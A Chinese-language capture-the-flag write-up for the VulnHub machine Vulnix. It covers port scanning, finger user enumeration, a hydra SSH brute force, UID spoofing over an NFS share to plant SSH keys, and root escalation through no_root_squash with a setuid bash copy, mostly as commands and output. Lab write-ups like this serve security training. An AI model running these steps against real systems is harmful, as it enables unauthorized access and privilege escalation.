考点: ssh,nfs,hydra
靶机链接: https://www.vulnhub.com/entry/hacklab-vulnix,48/
环境配置 #
| 名称 | IP |
|---|---|
| Kali Linux | 192.168.88.135 |
| HACKLAB: VULNIX | 192.168.88.146 |
初步打点 #
端口扫描 #
$ export rip=192.168.88.146
$ sudo nmap -v -A $rip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10cd9ea0e4e030243ebd675f754a33bf (DSA)
| 2048 bcf924072fcb76800d27a648520a243a (RSA)
|_ 256 4dbb4ac118e8dad1826f58529cee345f (ECDSA)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after: 2022-08-31T17:40:12
| MD5: 58e3f1acfef6b6d1744c836fba244f0a
|_SHA-1: 712f69ba8c5432e5711c898b55ab0a8344a0420b
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f3e28c85de10c7b7a2435c5e784fc
|_SHA-1: 4a49a40701f137c881a34519981b1eee6856348e
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 33986/udp6 mountd
| 100005 1,2,3 40113/tcp mountd
| 100005 1,2,3 47217/tcp6 mountd
| 100005 1,2,3 48374/udp mountd
| 100021 1,3,4 33046/udp nlockmgr
| 100021 1,3,4 34071/tcp6 nlockmgr
| 100021 1,3,4 46066/tcp nlockmgr
| 100021 1,3,4 58531/udp6 nlockmgr
| 100024 1 35400/udp6 status
| 100024 1 39412/tcp status
| 100024 1 46645/udp status
| 100024 1 58409/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f3e28c85de10c7b7a2435c5e784fc
|_SHA-1: 4a49a40701f137c881a34519981b1eee6856348e
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f3e28c85de10c7b7a2435c5e784fc
|_SHA-1: 4a49a40701f137c881a34519981b1eee6856348e
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Issuer: commonName=vulnix/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after: 2022-09-02T17:40:22
| MD5: 2b3f3e28c85de10c7b7a2435c5e784fc
|_SHA-1: 4a49a40701f137c881a34519981b1eee6856348e
2049/tcp open nfs_acl 2-3 (RPC #100227)
79 #
参考 https://book.hacktricks.xyz/network-services-pentesting/pentesting-finger
$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar xvf finger-user-enum-1.0.tar.gz
$ tar xvf finger-user-enum-1.0.tar.gz
使用finger-user-enum.pl穷举用户
$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.88.146
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
admin@192.168.88.146: finger: admin: no such user...
info@192.168.88.146: finger: info: no such user...
adm@192.168.88.146: finger: adm: no such user...
root@192.168.88.146: Login: root Name: root..Directory: /root Shell: /bin/bash..Never logged in...No mail...No Plan...
administrator@192.168.88.146: finger: administrator: no such user...
user@192.168.88.146: Login: user Name: user..Directory: /home/user Shell: /bin/bash..Never logged in...No mail...No Plan.....Login: dovenull Name: Dovecot login user..Directory: /nonexistent Shell: /bin/false..Never logged in...No mail...No Plan...
azureuser@192.168.88.146: finger: azureuser: no such user...
7 results.
测试靶机名vulnix作为用户名
$ finger vulnix@192.168.88.146
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
找到三个用户 root,user ,vulnix
2049 #
$ showmount -e 192.168.88.146
Export list for 192.168.88.146:
/home/vulnix *
获得权限 #
hydra #
$ hydra -L user -P /usr/share/wordlists/rockyou.txt 192.168.88.146 ssh
login: user
password: letmein
authorized_keys #
查看靶机vulnix用户UID/GID为2008
本地新建vulnix用户,编写UID/GID为2008
$ sudo mount -t nfs 192.168.88.146:/home/vulnix /tmp/vulnix
$ cp .ssh/id_rsa.pub /tmp
kali切换vulnix用户
$ su vulnix
$ cd /tmp/vulnix
$ mkdir .ssh
$ cat /tmp/id_rsa.pub >/tmp/vulnix/.ssh/authorized_keys
使用密钥登录vulnix用户,登录成功
提权 #
添加
/ *(rw,no_root_squash)
重启靶机生效
$ sudo mount -t nfs 192.168.88.146://tmp/t
挂载靶机根目录
思路一 #
authorized_keys
kali切换root用户
$ cd /tmp/v/root
$ mkdir .ssh
$ cat /tmp/id_rsa.pub >/tmp/v/root/.ssh/authorized_keys
使用密钥登录root用户,登录成功
思路二 #
bash
$ cp /tmp/v/bin/bash /tmp/v/home/vulnix
$ chmod 4755 /tmp/v/home/vulnix/bash
